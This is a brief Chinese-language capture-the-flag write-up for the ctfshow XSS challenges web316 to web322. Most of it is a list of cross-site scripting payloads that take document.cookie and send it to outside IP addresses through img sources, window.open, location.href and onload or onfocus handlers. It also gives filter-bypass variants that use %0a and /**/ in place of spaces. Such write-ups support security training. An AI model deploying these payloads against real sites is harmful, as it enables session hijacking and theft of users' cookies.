ctfshow-xss

刷一下ctfshow的xss

xss-lab就是个热身自己x自己

https://xz.aliyun.com/t/4067

payload

<script>
var img=document.createElement("img"); img.src="http://118.31.168.198:39543/"+document.cookie;
</script>
<script>window.open('http://118.31.168.198:39543/'+document.cookie)</script>

<script>location.href='http://118.31.168.198:39543/'+document.cookie</script>

<script>window.location.href='http://118.31.168.198:39543/'+document.cookie</script>

<input onfocus="window.open('http://118.31.168.198:39543/'+document.cookie)" autofocus>
通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发

<svg onload="window.open('http://118.31.168.198:39543/'+document.cookie)">

<iframe onload="window.open('http://118.31.168.198:39543/'+document.cookie)"></iframe>

<body onload="window.open('http://118.31.168.198:39543/'+document.cookie)">

web316

随便一个能外带的poc打就行提交之后后端会自动访问的

web317 web318 web319

<body onload="window.open('http://8.210.90.129:1234/'+document.cookie)">

web320

<body%0aonload="document.location.href='http://8.210.90.129:1234?xss='+document.cookie"></body>

<body/**/onload="document.location.href='http://8.210.90.129:1234?xss='+document.cookie"></body>

web321 web322

<body/**/onload="document.location.href='http://8.210.90.129:1234?1='+document.cookie"></body>